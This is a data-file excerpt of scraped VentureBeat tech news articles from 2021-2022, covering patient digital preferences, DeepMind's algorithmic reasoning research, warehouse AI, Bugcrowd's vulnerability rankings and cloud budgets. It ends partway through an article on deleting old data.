id
int64
0
17.2k
year
int64
2k
2.02k
title
stringlengths
7
208
url
stringlengths
20
263
text
stringlengths
852
324k
15,067
2,021
"25% of patients prefer communicating with their provider digitally | VentureBeat"
"https://venturebeat.com/2021/09/24/25-of-patients-prefer-communicating-with-their-provider-digitally"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages 25% of patients prefer communicating with their provider digitally Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. 1 in 4 patients remain loyal to their healthcare provider because it’s easier to communicate with them digitally, alluding to a forthcoming surge in demand for digital offerings as technology-native generations increasingly take ownership of their healthcare, according to research from Patientco. COVID-19 has been a catalyst for change within the healthcare industry as demand for consumer-friendly resources has increased tenfold. While healthcare systems’ main priority should always be patient health and safety, it shouldn’t end there — a core objective should include leveraging today’s digital innovations to propel patient engagement. This takes meeting patients where they are to fuel positive patient experiences and health outcomes. Patientco’s 2021 State of the Patient Financial Experience report found 1 in 4 patients remain loyal to their healthcare provider because it’s easier to engage with them digitally, a trend expected to continue as technology-native generations seek care. The digital trends born during the pandemic are also here to stay. Nearly eight in ten providers plan to make their pandemic-driven telehealth policies permanent, even after COVID-19 subsides, demonstrating that patients are looking to engage with healthcare providers on their own terms. A strong digital footprint is a critical component of a vibrant healthcare ecosystem. Healthcare providers realize that digital investments will be vital to their organization’s success and getting patients back in for care following the pandemic. Providers have made strides, but there remains an ongoing need for them to foster trust with their patients, especially when it comes to their finances. Concerns about out-of-pocket costs are the #1 reason patients have skipped or delayed healthcare — not fear of contracting COVID-19. It’s clear that healthcare organizations should not stick with the status quo for their patient engagement strategy. There are ample opportunity — and demand — for better patient-provider interactions, from scheduling the patient’s first visit to accepting payment after treatment. The onus is on health system leaders to ensure every touchpoint of the healthcare journey reflects their commitment to achieving positive health outcomes for the patients and communities they serve. Read the full report by Patientco, now a part of Waystar. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,068
2,021
"DeepMind aims to marry deep learning and classic algorithms | VentureBeat"
"https://venturebeat.com/2021/09/10/deepmind-aims-to-marry-deep-learning-and-classic-algorithms"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages DeepMind aims to marry deep learning and classic algorithms Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Will deep learning really live up to its promise? We don’t actually know. But if it’s going to, it will have to assimilate how classical computer science algorithms work. This is what DeepMind is working on, and its success is important to the eventual uptake of neural networks in wider commercial applications. Founded in 2010 with the goal of creating AGI — artificial general intelligence, a general purpose AI that truly mimics human intelligence — DeepMind is on the forefront of AI research. The company is also backed by industry heavyweights like Elon Musk and Peter Thiel. Acquired by Google in 2014, DeepMind has made headlines for projects such as AlphaGo , a program that beat the world champion at the game of Go in a five-game match, and AlphaFold , which found a solution to a 50-year-old grand challenge in biology. Now DeepMind has set its sights on another grand challenge: bridging the worlds of deep learning and classical computer science to enable deep learning to do everything. If successful, this approach could revolutionize AI and software as we know them. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Petar Veličković is a senior research scientist at DeepMind. His entry into computer science came through algorithmic reasoning and algorithmic thinking using classical algorithms. Since he started doing deep learning research, he has wanted to reconcile deep learning with the classical algorithms that initially got him excited about computer science. Meanwhile, Charles Blundell is a research lead at DeepMind who is interested in getting neural networks to make much better use of the huge quantities of data they’re exposed to. Examples include getting a network to tell us what it doesn’t know, to learn much more quickly, or to exceed expectations. When Veličković met Blundell at DeepMind, something new was born: a line of research that goes by the name of Neural Algorithmic Reasoning (NAR), after a position paper the duo recently published. NAR traces the roots of the fields it touches upon and branches out to collaborations with other researchers. And unlike much pie-in-the-sky research, NAR has some early results and applications to show for itself. Algorithms and deep learning: the best of both worlds Veličković was in many ways the person who kickstarted the algorithmic reasoning direction in DeepMind. With his background in both classical algorithms and deep learning, he realized that there is a strong complementarity between the two of them. What one of these methods tends to do really well, the other one doesn’t do that well, and vice versa. “Usually when you see these kinds of patterns, it’s a good indicator that if you can do anything to bring them a little bit closer together, then you could end up with an awesome way to fuse the best of both worlds, and make some really strong advances,” Veličković said. When Veličković joined DeepMind, Blundell said, their early conversations were a lot of fun because they have very similar backgrounds. They both share a background in theoretical computer science. Today, they both work a lot with machine learning, in which a fundamental question for a long time has been how to generalize — how do you work beyond the data examples you’ve seen? Algorithms are a really good example of something we all use every day, Blundell noted. In fact, he added, there aren’t many algorithms out there. If you look at standard computer science textbooks, there’s maybe 50 or 60 algorithms that you learn as an undergraduate. And everything people use to connect over the internet, for example, is using just a subset of those. “There’s this very nice basis for very rich computation that we already know about, but it’s completely different from the things we’re learning. So when Petar and I started talking about this, we saw clearly there’s a nice fusion that we can make here between these two fields that has actually been unexplored so far,” Blundell said. The key thesis of NAR research is that algorithms possess fundamentally different qualities to deep learning methods. And this suggests that if deep learning methods were better able to mimic algorithms, then generalization of the sort seen with algorithms would become possible with deep learning. To approach the topic for this article, we asked Blundell and Veličković to lay out the defining properties of classical computer science algorithms compared to deep learning models. Figuring out the ways in which algorithms and deep learning models are different is a good start if the goal is to reconcile them. Deep learning can’t generalize For starters, Blundell said, algorithms in most cases don’t change. Algorithms are comprised of a fixed set of rules that are executed on some input, and usually good algorithms have well-known properties. For any kind of input the algorithm gets, it gives a sensible output, in a reasonable amount of time. You can usually change the size of the input and the algorithm keeps working. The other thing you can do with algorithms is you can plug them together. The reason algorithms can be strung together is because of this guarantee they have: Given some kind of input, they only produce a certain kind of output. And that means that we can connect algorithms, feeding their output into other algorithms’ input and building a whole stack. People have been looking at running algorithms in deep learning for a while, and it’s always been quite difficult, Blundell said. As trying out simple tasks is a good way to debug things, Blundell referred to a trivial example: the input copy task. An algorithm whose task is to copy, where its output is just a copy of its input. It turns out that this is harder than expected for deep learning. You can learn to do this up to a certain length, but if you increase the length of the input past that point, things start breaking down. If you train a network on the numbers 1-10 and test it on the numbers 1-1,000, many networks will not generalize. Blundell explained, “They won’t have learned the core idea, which is you just need to copy the input to the output. And as you make the process more complicated, as you can imagine, it gets worse. So if you think about sorting through various graph algorithms, actually the generalization is far worse if you just train a network to simulate an algorithm in a very naive fashion.” Fortunately, it’s not all bad news. “[T]here’s something very nice about algorithms, which is that they’re basically simulations. You can generate a lot of data, and that makes them very amenable to being learned by deep neural networks,” he said. “But it requires us to think from the deep learning side. What changes do we need to make there so that these algorithms can be well represented and actually learned in a robust fashion?” Of course, answering that question is far from simple. “When using deep learning, usually there isn’t a very strong guarantee on what the output is going to be. So you might say that the output is a number between zero and one, and you can guarantee that, but you couldn’t guarantee something more structural,” Blundell explained. “For example, you can’t guarantee that if you show a neural network a picture of a cat and then you take a different picture of a cat, it will definitely be classified as a cat.” With algorithms, you could develop guarantees that this wouldn’t happen. This is partly because the kind of problems algorithms are applied to are more amenable to these kinds of guarantees. So if a problem is amenable to these guarantees, then maybe we can bring across into the deep neural networks classical algorithmic tasks that allow these kinds of guarantees for the neural networks. Those guarantees usually concern generalizations: the size of the inputs, the kinds of inputs you have, and their outcomes that generalize over types. For example, if you have a sorting algorithm, you can sort a list of numbers, but you could also sort anything you can define an ordering for, such as letters and words. However, that’s not the kind of thing we see at the moment with deep neural networks. Algorithms can lead to suboptimal solutions Another difference, which Veličković noted, is that algorithmic computation can usually be expressed as pseudocode that explains how you go from your inputs to your outputs. This makes algorithms trivially interpretable. And because they operate over these abstractified inputs that conform to some preconditions and post-conditions, it’s much easier to reason theoretically about them. That also makes it much easier to find connections between different problems that you might not see otherwise, Veličković added. He cited the example of MaxFlow and MinCut as two problems that are seemingly quite different, but where the solution of one is necessarily the solution to the other. That’s not obvious unless you study it from a very abstract lens. “There’s a lot of benefits to this kind of elegance and constraints, but it’s also the potential shortcoming of algorithms,” Veličković said. “That’s because if you want to make your inputs conform to these stringent preconditions, what this means is that if data that comes from the real world is even a tiny bit perturbed and doesn’t conform to the preconditions, I’m going to lose a lot of information before I can massage it into the algorithm.” He said that obviously makes the classical algorithm method suboptimal, because even if the algorithm gives you a perfect solution, it might give you a perfect solution in an environment that doesn’t make sense. Therefore, the solutions are not going to be something you can use. On the other hand, he explained, deep learning is designed to rapidly ingest lots of raw data at scale and pick up interesting rules in the raw data, without any real strong constraints. “This makes it remarkably powerful in noisy scenarios: You can perturb your inputs and your neural network will still be reasonably applicable. For classical algorithms, that may not be the case. And that’s also another reason why we might want to find this awesome middle ground where we might be able to guarantee something about our data, but not require that data to be constrained to, say, tiny scalars when the complexity of the real world might be much larger,” Veličković said. Another point to consider is where algorithms come from. Usually what happens is you find very clever theoretical scientists, you explain your problem, and they think really hard about it, Blundell said. Then the experts go away and map the problem onto a more abstract version that drives an algorithm. The experts then present their algorithm for this class of problems, which they promise will execute in a specified amount of time and provide the right answer. However, because the mapping from the real-world problem to the abstract space on which the algorithm is derived isn’t always exact, Blundell said, it requires a bit of an inductive leap. With machine learning, it’s the opposite, as ML just looks at the data. It doesn’t really map onto some abstract space, but it does solve the problem based on what you tell it. What Blundell and Veličković are trying to do is get somewhere in between those two extremes, where you have something that’s a bit more structured but still fits the data, and doesn’t necessarily require a human in the loop. That way you don’t need to think so hard as a computer scientist. This approach is valuable because often real-world problems are not exactly mapped onto the problems that we have algorithms for — and even for the things we do have algorithms for, we have to abstract problems. Another challenge is how to come up with new algorithms that significantly outperform existing algorithms that have the same sort of guarantees. Why deep learning? Data representation When humans sit down to write a program, it’s very easy to get something that’s really slow — for example, that has exponential execution time, Blundell noted. Neural networks are the opposite. As he put it, they’re extremely lazy, which is a very desirable property for coming up with new algorithms. “There are people who have looked at networks that can adapt their demands and computation time. In deep learning, how one designs the network architecture has a huge impact on how well it works. There’s a strong connection between how much processing you do and how much computation time is spent and what kind of architecture you come up with — they’re intimately linked,” Blundell said. Veličković noted that one thing people sometimes do when solving natural problems with algorithms is try to push them into a framework they’ve come up with that is nice and abstract. As a result, they may make the problem more complex than it needs to be. “The traveling [salesperson] , for example, is an NP complete problem, and we don’t know of any polynomial time algorithm for it. However, there exists a prediction that’s 100% correct for the traveling [salesperson], for all the towns in Sweden, all the towns in Germany, all the towns in the USA. And that’s because geographically occurring data actually has nicer properties than any possible graph you could feed into traveling [salesperson],” Veličković said. Before delving into NAR specifics, we felt a naive question was in order: Why deep learning? Why go for a generalization framework specifically applied to deep learning algorithms and not just any machine learning algorithm? The DeepMind duo wants to design solutions that operate over the true raw complexity of the real world. So far, the best solution for processing large amounts of naturally occurring data at scale is deep neural networks, Veličković emphasized. Blundell noted that neural networks have much richer representations of the data than classical algorithms do. “Even inside a large model class that’s very rich and complicated, we find that we need to push the boundaries even further than that to be able to execute algorithms reliably. It’s a sort of empirical science that we’re looking at. And I just don’t think that as you get richer and richer decision trees, they can start to do some of this process,” he said. Blundell then elaborated on the limits of decision trees. “We know that decision trees are basically a trick: If this, then that. What’s missing from that is recursion, or iteration, the ability to loop over things multiple times. In neural networks, for a long time people have understood that there’s a relationship between iteration, recursion, and the current neural networks. In graph neural networks , the same sort of processing arises again; the message passing you see there is again something very natural,” he said. Ultimately, Blundell is excited about the potential to go further. “If you think about object-oriented programming, where you send messages between classes of objects, you can see it’s exactly analogous, and you can build very complicated interaction diagrams and those can then be mapped into graph neural networks. So it’s from the internal structure that you get a richness that seems might be powerful enough to learn algorithms you wouldn’t necessarily get with more traditional machine learning methods,” Blundell explained. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,069
2,021
"AI technology modernizes warehouse management | VentureBeat"
"https://venturebeat.com/2021/11/01/ai-technology-modernizes-warehouse-management"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages AI technology modernizes warehouse management Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Like all other elements in the enterprise, the warehouse management stack is becoming increasingly automated and more intelligent by the day. Despite this, the technology is not only focused on the warehouse floor and the needs of an expanding robotics workforce. Instead, you’ll find just as much activity happening behind the scenes with planning, provisioning, and other processes carried out by unseen software modules. These new tools will play a crucial role in smoothing out the many bumps that still exist in the warehouse management sector, and perhaps provide crucial relief to an over-stressed supply chain. Key applications Warehouse optimization platform developer Lucas Systems recently highlighted the five ways in which AI is expected to impact warehouses and distribution centers, only one of which involved robots. Key issues like dynamic product slotting, where products are transferred from one place to another, and workforce planning will be simplified significantly, at least for human managers. As well, performance management and safety metrics can be more easily met with AI support , and it will even help workers navigate around extremely dynamic and fast-moving environments more easily and safely. Despite this, recent research from Vanson Bourne shows that while most warehouse directors and managers have high hopes for AI, few are using it for much beyond inventory management. Part of this is due to the lack of internal knowledge and experience with what is a radically new approach to systems and process management. Additionally, there is still lingering fear, uncertainty, and doubt regarding aspects like risk and control. This will have to change soon, considering most executives say they expect upwards of 60% ROI on their AI investments within five years. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! AI will also help transform the physical warehouse, overseeing often crucial functions like power management and temperature control, and eventually, it may even alter the size and location of facilities. Peter Lewis, the founder, and chairman of Wharton Equity Partners sees a world in which fully automated micro centers could provide better service and better quality products, particularly food, to underserved communities. Rural areas would be key beneficiaries of these new warehouses, which would require minimal infrastructure and only a modest workforce, if any, to operate. Intelligent links in the chain By transforming a warehouse into an intelligent, automated entity, the enterprise also takes a giant step forward in breaking down the silos that hamper performance across supply chains and distribution tactics. Jerry Stephens, VP of global sales at Outlier AI Inc. says a connected warehouse overcomes many of the key roadblocks that prevent all elements of this intricate system from working together as they should. For one thing, greater visibility into inventory and the movement of goods can proactively help managers to stay ahead of emerging problems rather than take corrective action after productivity has been impacted. Additionall, planning and optimization platforms can operate in near real-time thanks to the rapid analytics that AI can provide. In this way, AI can boost productivity and revenue by targeting all the key steps in delivering goods and services to the market, namely, demand planning, manufacturing, transportation, and fulfillment. In the warehouse, in particular, organizations will keep better track of meaningful changes in multiple key performance indicators, not just across days or weeks but by the hour. Ultimately, we can expect AI to further integrate warehouse management into the enterprise data stack. Even the robots on the floor will become data generators, feeding vital information back to AI-driven software. The end goal is to create a more visible, interactive warehouse that is more adaptable and far more responsive to the many rapid and minute changes affecting the supply chain. But just as in other aspects of the enterprise, AI-driven warehousing is not simply a platform to be deployed but a fundamental change in the way data, systems, and human operators interact with one another. It will take a concerted effort to first convert warehouse management to this new mode of operation, and then even greater determination to guide its adaptation to suit each enterprise’s unique business model. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,070
2,022
"Accidental exposure of sensitive data has been surging, Bugcrowd finds | VentureBeat"
"https://venturebeat.com/2022/01/18/accidental-exposure-of-sensitive-data-has-been-surging-bugcrowd-finds"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Accidental exposure of sensitive data has been surging, Bugcrowd finds Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Instances where sensitive internal data was accidentally left exposed shot upward in 2021, ranking significantly higher in the latest vulnerability report from bug bounty platform Bugcrowd. The 2022 edition of the Bugcrowd Priority One Report ranked vulnerability types based upon frequency of reports from the platform’s community of researchers. The report excluded the Apache Log4j vulnerability because the report’s timeframe started with the fourth quarter of 2020 and ran through the end of the third quarter of 2021. The Log4j remote code execution flaw was disclosed in December. Speed vs. security In Bugcrowd’s latest report, one vulnerability type — sensitive data exposure involving internal assets — made a particularly massive gain. The vulnerability jumped to the No. 3 position, from No. 9 in the previous year’s report. This ascendance is “a reflection of the fact that COVID basically forced the entire planet to do a whole bunch of unnatural stuff, really quickly, when it came to technology,” Bugcrowd founder and chief technology officer Casey Ellis said in an interview. In other words, “haste is the natural enemy of security,” he said. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! The increased prevalence of sensitive internal data exposure is also concerning because any instance of this happening “tends to be pretty catastrophic in its consequences,” Ellis said. Exposure of sensitive data will often lead to a breach or fine related to the CCPA or GDPR privacy regulations, for instance. An infamous example of the issue is a misconfiguration , or negligence, that leaves an Amazon S3 (Simple Storage Service) bucket open and accessible. “That can happen quite easily when you’ve got a lot of developers working on a project quickly. And they’ll just dump some stuff onto the internet so that everyone can use it for work — but then they forget to take it down,” Ellis told VentureBeat. “Or, they don’t secure it properly as they put it up on the internet, because that’s too hard. ‘Why would I go through the internal security team, when I can just use a credit card and get an S3 bucket and toss it up there — and we’ll get the job done more quickly.'” Exposing sensitive internal data is thus a “really easy mistake to make,” but also “easy to avoid” if the right incentives are there for developers to do so, he said. Web app flaws The two vulnerability types that ranked at the top in Bugcrowd’s report, in terms of frequency, are typically not as consequential — though they still can be, depending on the situation. Ranking at No. 1 in the report was cross-site scripting, which moved up from No. 2 in the prior year’s report. Also known as XSS, cross-site scripting is a web application bug that has existed since the 2000s, but remains very common and difficult to avoid, Ellis said. The vulnerability can allow attackers to send malicious code to end users of a web application. The increased prevalence of XSS reflects the “rapid deployment of home-grown web applications throughout 2020 and 2021,” Bugcrowd said in its report — another case of velocity resulting in corners being cut around security. With the dramatic rise in work-from-home and digital commerce during the pandemic, “the priority for a lot of software development over the past two years has been ease of access,” Ellis said. “The problem with that is, if the customer can access it, then the bad guys probably can as well.” At No. 2 on the vulnerability list was a type of broken access control — insecure direct object references, or IDOR. The flaw — which had ranked at No. 1 in the prior year’s report — involves the use of access permissions to do something that shouldn’t be possible. An example is accessing someone else’s banking or health care record just by entering in a different record number after you’ve logged in to the site. “If you increment that record number, what should happen is it should say, ‘Sorry, you’re not authorized to access this.’ Or even better, a 404 error,” Ellis said. “But it doesn’t always happen like that.” Log4j While the vulnerability in Log4j, a widely used Java logging library, was revealed outside of the timeframe of the Bugcrowd report, the vulnerability also cuts across several vulnerability types. It’s similar in some ways to an unvalidated redirect vulnerability (No. 9 in the report) as well as to broken access control, Ellis said — but the core of the flaw is an issue with input sanitization, which is not one of the vulnerabilities on the list. With the Log4j flaw, “the trigger was a lack of input sanitization, which is actually an injection issue. You could execute commands in a place where you shouldn’t have been able to do that,” he said. Misaligned incentives Ultimately, many software vulnerabilities derive from the “imperative of the developer to make the thing work,” Ellis said. Developers are generally not measured or compensated based on making sure that what they create “doesn’t do all the stuff it shouldn’t,” he said. And that, unfortunately, is “where security vulnerabilities tend to exist.” This dynamic is foundational to why Ellis founded Bugcrowd a decade ago, he said. The thesis from the start was to create incentives for finding vulnerabilities, given that those incentives do exist for cyber criminals, according to Ellis. There are hopeful signs, however. In sectors including software and financial services, Bugcrowd saw a major uptick in activity in 2021 around uncovering bugs. In the software sector, payouts grew 73%. And in financial services, valid submissions to the Bugcrowd platform climbed by 82%, while payouts jumped 106%. Financial services companies, in particular, are now starting to promote their security initiatives as a way to differentiate, Ellis said. “We’re seeing the financial services companies that we work with use bug bounty and vulnerability disclosure as a way of saying, ‘We do take [customer] security seriously — before a breach,'” he said. It’s another indicator that cybersecurity is being viewed less as an “insurance policy” and more as a priority that can help the business, Ellis said. “I think that’s actually a big shift for the industry, in general,” he said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,071
2,022
"The struggle to keep cloud budgets in check | VentureBeat"
"https://venturebeat.com/2022/02/06/the-struggle-to-keep-cloud-budgets-in-check"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community The struggle to keep cloud budgets in check Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. By Maxim Melamedov, CEO and cofounder of Zesty. Cloudy with a chance of pitfalls The cloud is among the most widely adopted digital tools of the past decade. Almost all of us rely on it every single day for our email, our work tools, our storage — the list goes on. But much like the clouds in the sky, the virtual cloud is also in a constant state of flux, both in the way it works and the ways we use it, with new storms always brewing. In a recent survey of CIOs and CTOs, we were able to identify some of the pressing challenges they are facing with public cloud environments. The research found that budgetary strain was the number one concern facing people directly charged with managing cloud costs. Indeed, the CIOs and CTOs surveyed said they expected cloud spending to comprise 47% of the technology budget for SMEs in 2022 — a whopping 67% increase from 2021. If this trend continues, such spending will likely account for over half of technology budgets by 2023. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! These numbers reflect the deep reliance on the cloud in today’s business environment — but they also raise rightful concerns among innovation leaders who want to know why the cloud — which was supposed to help save money — has quickly gobbled up their budgets. Here are a few reasons: Cloud budgets: People don’t know what they don’t know Technological innovation looks toward the future, even when the future is hard to predict. Accordingly, more than half (58%) of the CIOs and CTOs said they have difficulty predicting future cloud needs, resulting in preemptive overspending despite maturing finops ( cloud financial operations ) capabilities. Technology leaders do see the value in finops — 100% of them told us as much — but the question remains: which finops technology is best suited to the specific needs of an organization? Executives aren’t always sure. Despite the recognized value afforded by finops implementation, only 29% of CIOs and CTOs have what they consider a mature strategy in place that allows them to evolve and plan more efficiently from one year to the next. Money isn’t the only thing getting wasted in a cloud budget Despite widespread reliance on cloud services, 58% of respondents reported that the hardest element of managing cloud costs was the initial search for a cloud offering that best matches their workload needs. Those who work regularly with the cloud are probably aware of the all-too-common risk of over provisioning resources. In fact, 42% of CIOs and CTOs reported suboptimal resource utilization as the primary challenge they face when strategizing cloud use. This blend of redundant over provisioning, garnished with an inability to scale quickly in the face of shifting needs and circumstances, yields a bitter cocktail of wasted resources. It is no surprise, then, that the second and third-greatest cloud challenges were difficulties in justifying budget increases (34%) and difficulty in adhering to allocated cloud budgets (31%), respectively. Keeping up with an abundance of moving parts Budgets aren’t the only factor that leaders must be keenly aware of. According to 42% of survey respondents, the number one cloud priority before the pandemic was security investments, but with the financial blow that COVID-19 dealt to many organizations and the myriad of other concerns on these technologists’ minds in the wake of the pandemic, this has since dropped to fourth place (18%). The priorities that have risen in its stead are revenue-related, such as aligning the speed of IT delivery with the speed of business (25%), ensuring that compliance needs are met (22%), and increasing direct revenues (20%). However, among those using multicloud or a cloud-hybrid strategy, security is still the top priority (59%). CIOs are understandably averse to relying on a single vendor’s security protocols and feel their data is safer in a multi-cloud environment. Priority number two, close behind at 56%, is harnessing the technological advantages offered by specific cloud providers — for example, those that provide AI-integrated cloud capabilities — with cost efficiency reported as the third consideration (39%) when going multi or hybrid. These results suggest that choosing between budget, performance, and stability when constructing a cloud strategy is an ongoing issue. At its best, the cloud is meant to alleviate companies and their employees of a slew of burdens, not add to the pile. But the technology’s ever-shifting landscape has brought us to a point where managing the cloud has become a burden unto itself. As we look towards the future of the cloud, identifying the origin of today’s storm is the first step in the search for tomorrow’s brighter skies. Maxim Melamedov is the CEO and cofounder of Zesty. DataDecisionMakers Welcome to the VentureBeat community! DataDecisionMakers is where experts, including the technical people doing data work, can share data-related insights and innovation. If you want to read about cutting-edge ideas and up-to-date information, best practices, and the future of data and data tech, join us at DataDecisionMakers. You might even consider contributing an article of your own! Read More From DataDecisionMakers The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! DataDecisionMakers Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,072
2,022
"It’s time to light the match and burn your data | VentureBeat"
"https://venturebeat.com/2022/03/26/its-time-to-light-the-match-and-burn-your-data"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Community It’s time to light the match and burn your data Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. If you spend time reading the latest quarterly results from any company, there will undoubtedly be discussion of how much they invest and how good they are at analyzing and using information. Silicon Valley is filled with companies that are dedicated to creating, consuming and analyzing huge amounts of data. We have been told that data is a currency , its value increasing as ever more complex, sophisticated technologies are applied to derive insight. However, if data is not only a currency, but a debt instrument, its intrinsic value can quickly turn negative. The value of old data: A new calculus The value of information is obvious: it is needed across nearly all functions of an organization, from small local businesses to the largest financial services and technology companies. But information risk calculations remain inconsistent. Information security-related risks have been highlighted by commentators, breaches and ransomware attacks. Yet, even with these well-known risks, organizations often struggle to delete, well, anything. There are three primary reasons that businesses have been reluctant to delete data: (1) its potential value or use at some point in the future, (2) legal or compliance concerns regarding spoliation or deleting the wrong information and (3) an incomplete view of information across the organization. The first issue is often the most difficult to resolve. Marketing, sales, development and product teams have an insatiable appetite for data to deliver results. The idea of deleting information, even if nominally used today, that might provide unique insights in the future is terrifying. And the ever-increasing sophistication of analytics capabilities provides the ability to draw subtle inferences without significant incremental investment. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! In contrast, legal and compliance concerns are generally becoming more manageable. For a long time, the risk of spoliation in legal 